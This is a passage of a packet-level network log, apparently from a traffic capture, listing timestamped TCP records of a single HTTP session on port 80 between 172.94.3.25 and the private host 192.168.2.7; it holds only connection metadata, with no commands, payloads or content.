Sep 25, 2024 18:33:54.648307085 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648324013 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648349047 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648835897 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648850918 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648864985 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648879051 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648885012 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648895979 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648910999 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648915052 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648933887 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648950100 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648951054 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648963928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648978949 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.648991108 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.648993969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649008989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649023056 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649024963 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649039984 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649054050 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649055004 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649068117 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649081945 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649085045 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649097919 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649111986 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649116039 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649126053 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649127960 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649141073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649156094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649171114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649182081 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649187088 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649202108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649211884 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649216890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649219036 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649257898 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649777889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649795055 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649811983 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649840117 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649847031 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649853945 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649868011 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649873018 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649883032 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649898052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649900913 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649913073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649928093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649944067 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649946928 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649959087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649966955 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.649974108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649987936 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.649991035 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.650002003 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.650017023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.650032997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.650032997 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.650047064 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.650057077 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.650068998 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.650084019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.650085926 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.650098085 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.650115013 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.650132895 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.650151968 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.870347023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.870462894 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.891269922 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.896182060 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896231890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896248102 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896282911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.896356106 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896370888 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896384954 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896399975 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896414042 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.896445036 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.896477938 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896492004 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896559000 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.896612883 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896627903 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896642923 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896656990 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896672964 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896681070 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.896681070 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.896687031 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896707058 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.896873951 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896888018 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896903038 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896917105 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896931887 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896948099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896950006 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.896950006 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.896964073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.896970034 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.897151947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897166014 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897181034 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897195101 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897197962 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.897197962 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.897208929 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897222996 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897237062 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897253990 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.897253990 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.897260904 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897377968 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.897700071 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897713900 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897727966 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897747993 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.897835016 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897849083 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897862911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897877932 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897897005 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.897897005 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.897907972 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.897947073 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.898106098 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898161888 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898176908 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898209095 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.898278952 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898293972 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898308039 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898345947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898363113 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.898363113 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.898410082 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898423910 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898438931 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898453951 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898472071 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.898472071 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.898479939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898494959 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898509026 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898524046 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.898546934 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.898546934 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.899122953 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899162054 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.899168015 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899183035 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899269104 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899282932 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899296999 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899312019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899313927 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.899313927 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.899410009 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.899492979 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899507046 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899519920 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899533987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899549007 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899560928 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.899560928 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.899564028 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899578094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899594069 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.899600029 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.899662018 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.900156021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900193930 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900208950 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900332928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900350094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900357962 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.900365114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900381088 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900398970 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.900398970 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.900564909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900588989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900599003 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.900603056 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900616884 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900631905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900646925 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900661945 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900676966 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.900676966 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.900677919 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.900896072 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.901047945 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901093006 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901108980 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901155949 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.901155949 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.901204109 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901218891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901233912 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901249886 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901292086 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.901292086 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.901525021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901573896 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901588917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901607037 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.901645899 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901659966 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901676893 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901715040 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.901715040 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.901792049 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901807070 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901822090 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901835918 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901849985 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.901849985 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901866913 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901901960 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.901901960 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.901916027 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901940107 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901957989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.901990891 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.902497053 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902556896 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902560949 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.902571917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902586937 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902664900 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902679920 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902698994 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.902698994 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.902702093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902717113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902731895 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902761936 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.902761936 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.902839899 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902853966 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902868032 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902884007 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902903080 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.902930021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902945042 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.902988911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.902988911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.903526068 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903538942 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903553009 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903587103 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.903605938 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903620958 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903636932 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903654099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903661013 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.903673887 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.903810978 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903825045 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903840065 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903847933 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.903866053 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903881073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903897047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903912067 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903925896 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.903932095 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.903932095 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.903985023 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.904448986 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.904493093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.904508114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.904536963 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.904536963 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.904618025 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.904630899 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.904644966 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.904659986 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.904673100 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.904738903 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.904982090 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.904994965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905011892 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905056953 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905071020 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905085087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905101061 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.905101061 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.905101061 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905150890 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.905277967 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905292034 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905308962 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905323982 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905328035 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.905338049 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905353069 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905368090 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.905368090 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.905369043 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905385017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905625105 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.905900002 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905932903 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905946970 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.905966043 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.906044006 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906058073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906070948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906088114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906090021 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.906090021 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.906114101 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.906203985 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906229019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906243086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906256914 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906270027 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.906274080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906287909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906305075 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.906312943 CEST	80	49699	172.94.3.25	192.168.2.7
